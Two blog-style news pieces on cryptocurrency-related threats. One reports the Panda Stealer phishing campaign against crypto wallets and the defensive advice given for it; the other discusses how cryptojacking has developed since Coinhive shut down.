Panda attacks on crypto wallets

I’m not talking about attacks by a cuddly black and white bear from China, but instead a series of new ransomware attacks. The ‘Panda’ malware has been targeting cryptocurrency wallets, “along with account credentials from other applications such as NordVPN, Telegram, Discord and Steam,” according to a Coindesk report.

Trend Micro, a cybersecurity company, discovered the malware that steals information and dubbed it ‘Panda Stealer’. The malware has been found targeting individuals across countries including the US, Australia, Japan, and Germany.

The malware begins its infection chain through phishing emails that pretend to be business quote requests.

According to ZDNet, two methods have been linked to the campaign: the first uses attached .XLSM documents that require victims to enable malicious macros.If macros are permitted, a loader then downloads and executes the main stealer. 

In the second method, “an attached .XLS file contains an Excel formula that hides a PowerShell command. This command attempts to access a URL to pull a PowerShell script to the victim’s system and to then grab a fileless payload.”

Once downloaded, Panda Stealer will attempt to detect keys and addresses associated with cryptocurrency wallets holding funds including Ethereum (ETH), Litecoin (LTC), Bytecoin (BCN), and Dash (DASH).

Trend Micro researchers who discovered the attack said, “Crypto wallets are now as big of a target for online theft as banking accounts are. With more people getting into cryptocurrencies and the values of said cryptocurrencies still increasing, this will only become a greater threat moving forward.”

They also pointed out that there is more risk here as unlike theft via a bank or a credit card, there may not be a central authority that can undo malicious transactions. Once you lose your money and the transaction goes on the blockchain, it’s likely gone forever.

“None of this is particularly novel in and of itself – malicious Office documents are well known, so is fileless loading,” Trend Micro researchers said. “The main “new” aspect here is the target of the data theft.” For example, attackers are setting their sights on applications like Discord and Telegram – popular communications platforms for cryptocurrency communities. 

Even if this type of attack is new, Trend Micro recommends following standard security practices, such as not opening up attachments sent via email, making sure you don’t click on unknown links, and keeping software up still are basic security measures people can take to avoid malware and other security breaches. They added that the best advice is to secure your cryptocurrency wallets and recommended using strong, unique passwords, and commented, “For investors who are more interested in holding cryptocurrencies for the long term instead of actively trading them, the use of hardware-based/offline wallets may well be safer, if less convenient to add to or sell from.”

Cryptojacking in 2019 is not dead — it’s evolving!

Cryptojackers have shut down university networks and government websites, but there was one case that attracted a lot of attention, and that is the use of Coinhive mining service focused on mining Monero.

With the closure of Coinhive it appeared that cryptojacking might be coming to an end. Coinhive was a cryptocurrency mining service that relied on a small chunk of computer code installed on websites. It released its mining code in 2017, pitching it as a way for website owners to earn an income without running intrusive or annoying advertisements. However, although Coinhive was not an inherently malicious code, it became popular among hackers for cryptojacking. The more people visited a site, the more processing power was siphoned off to mine Monero.

Coinhive malware

The platform had seemed like a good idea until the software went on to form the foundation of the notorious cryptojacking malware that ended up affecting millions of user devices, spiking electricity bills, and draining batteries to secretly and illicitly mine cryptocurrency, as Conor Maloneywrites for CCN. Furthermore, as more and more criminals hacked sites and planted the Coinhive file, the issue shot completely out of control. Maloney writes: “Coinhive was listed as the world’s greatest online malware threat by cybersecurity firm Check Point for 15 consecutive months, and an estimated 5% of all Monero was mined through cryptojacking.”

Coinhive announced that it would be shutting down operations on 8th March 2019, and many thought that would be the end of intensive cryptojacking activity. However, Maloney points out that while the cryptojackers can’t turn to Coinhive anymore, they will look for other means of attack.

The Coinhive vacuum is waiting to be filled

Chris Dawson, Threat Intelligence Lead at Proofpoint, a security company, commented that Coinhive was far from the only cryptojacking malware on the market, adding “the fall of Coinhive leaves a power vacuum waiting to be filled,” as he told Maloney. Dawson sees a thrat coming from other forms of malware, such as “banking trojans, credential stealers and pieces of malware which sit on machines.”

Others, such as Jerome Segura of Malwarebytes, believe the criminal industry is slowing down. He told ZDNet the criminal industry is slowing down: “There are still a lot of hacked sites with Coinhive code, but I have a feeling these are mostly remnants from past hacks. Most of what I see these days is CoinIMP [a Coinhive competitor] and it’s been active again with Drupal hacks recently. But overall, I think the trend is nearing out.”

Is Segura too optimistic? Ransomeware like WannaCry and Petya have dealt catastrophic blows, taking down services at hospitals, car factories, government facilities, and airports as well as infecting personal devices to extract a ransom that is usually payable in Bitcoin. And cryptojacking malware still exists — Cryptoloot being one example, the second most lethal after Coinhive. There is also Emotet, a banking Trojan, which can infect a computer as a malicious attachment and be used to spread other forms of malicious software, plus a host of password-collecting bots.

It may be good news that Coinhive has closed down, but we cannot be complacent and believe the threat of cryptojacking has gone away. As long as there is cryptocurrency for the taking, cryptojackers will be evolving their tactics for getting their hands on it, and we need to be more vigilant than ever.